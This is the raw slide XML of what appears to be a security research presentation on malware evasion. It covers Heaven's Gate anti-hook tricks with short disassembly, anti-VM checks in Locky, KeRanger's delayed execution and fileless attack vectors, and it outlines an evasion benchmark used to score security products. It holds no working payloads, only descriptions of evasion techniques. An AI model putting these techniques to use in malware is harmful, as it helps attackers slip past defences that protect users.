              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) tricks to: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      1. 32bit Malware  call 64bit API in system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> (64bit ntdll.dll)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>           whereas security vendor hook 32bit system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> (32bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ntdll.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>      2. Bypass user mode hook in Wow64 program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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wow64cpu!X86SwitchTo64BitMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>     00000000`756b2320 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ea1e276b753300  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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0033</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>756B271E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>      wow64cpu!CpupReturnFromSimulatedCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>     00000000`756b271e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 67448b0424      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>     r8d,dword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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7762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823"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="72823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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Anti-Hook with Switch32to64	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	4/4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1400" dirty="0" smtClean="0"/>
              <a:t>---TROJ_LOCKY.DLDRA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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771550"/>
            <a:ext cx="7344730" cy="386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39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0"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="97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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Anti-VM &amp; Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Ransomware-Locky!enc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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Ransomware-Locky!enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> discovered in June 2016 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Malicious JavaScript download and execute malicious packed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion Tricks to: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      1. Virtual machine detection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- Checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>the time difference between these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>two system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APIs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  2. Magic parameter check to expose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> behavior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      - Environment check tricks in Anti-Sandbox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- Hardcoded seed as parameter when calling exported function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841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993"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="37993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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Anti-VM &amp; Environment check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2/2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sz="1400" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>Ransomware-Locky!enc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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538819"/>
            <a:ext cx="8208912" cy="469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337"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="226337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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Mac Ransomware Evasion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536" y="607375"/>
            <a:ext cx="8366760" cy="3816424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Transmission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>BitTorrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Installer Infected in March of 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>KeRanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sleeps for three days </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>before fully executing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Encrypt all document files under “/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Users” and “/Volumes” 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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW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1685265"/>
            <a:ext cx="5813534" cy="345823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569110" y="1851670"/>
            <a:ext cx="1872208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81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141"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="67141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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Attack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 smtClean="0"/>
              <a:t>Malicious payload is (almost) all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>executed  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>only in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Motivations for memory execution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" alt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875204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="402336" y="1635646"/>
          <a:ext cx="8562152" cy="315602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81432">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2279425049"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3456384">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="258139152"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3024336">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3153578766"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="42948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Motivation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Fileless</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t> Attack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Traditional</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t>Sandbox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Detection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47416469"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42948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Bypass</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> file scan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No File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Scan file on demand or timely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71163743"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="434610">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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Interference</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t> behavior correlation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Use Script or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>Cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t> under cloak</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> of system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System</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> API level Hook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12715735"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43461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Bypass Sandbox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Time delay</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (e.g. Schedule Task)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Monitor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> within restricted time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92636073"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37168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Anti-forensics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Infection traces in memory is volatile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*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47435249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37168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90378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381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1"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="2051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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attack - Brief summary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 smtClean="0"/>
              <a:t>Attack vector summary for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" alt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966903"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="402336" y="1419622"/>
          <a:ext cx="8562152" cy="360040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81432">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2279425049"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3456384">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="258139152"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3024336">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3153578766"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="498718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Attack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> vector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Fileless</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t> Attack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Reactive measures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47416469"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="498718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WinRM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*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*</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN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67876726"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="498718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WMI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*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Hook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> com interface</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN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71163743"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="504668">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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*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Hook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> com interface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12715735"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="74325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Script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VBA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> in office, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
                        <a:t>.JS .HTA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
                        <a:t> .PUB .CHM</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
                        <a:t>……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Operate to support more types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92636073"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42472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System Utility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Powershell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en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dotnet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>……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*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69468275"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4316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90378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578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99"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="23199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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Attack in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Duqu2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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699542"/>
            <a:ext cx="8208912" cy="438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7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858"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="140858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03648" y="1923678"/>
            <a:ext cx="6329904" cy="1512168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0"/>
              <a:t>Evasion Benchmark</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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58465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35"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="5735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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Internal Benchmark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Data  	1/3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09158" y="699542"/>
            <a:ext cx="8366760" cy="3816424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Test methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	Collect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>methods from benchmark tool and real world sample</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-	Hundreds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Test different level implementation (if available) of one method (vendor monitor ability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	Script </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	WMI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>- 	Instruction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Assign different score for bypass and identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>points for bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-	1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>point for identification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6423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269"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="91269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endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Noteworthy Evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Case Study</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evasion Benchmark &amp;&amp; Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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8958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51"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="45051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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Executive Summary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536" y="915566"/>
            <a:ext cx="8366760" cy="3816424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Threat with evasion has been emerging and increasing with popularity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion battle field has been transferring  from PE to script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> attack emerged to bypass sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Traditional s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>andbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> not understand  behavior semantic in script level </a:t>
            </a:r>
          </a:p>
          <a:p>
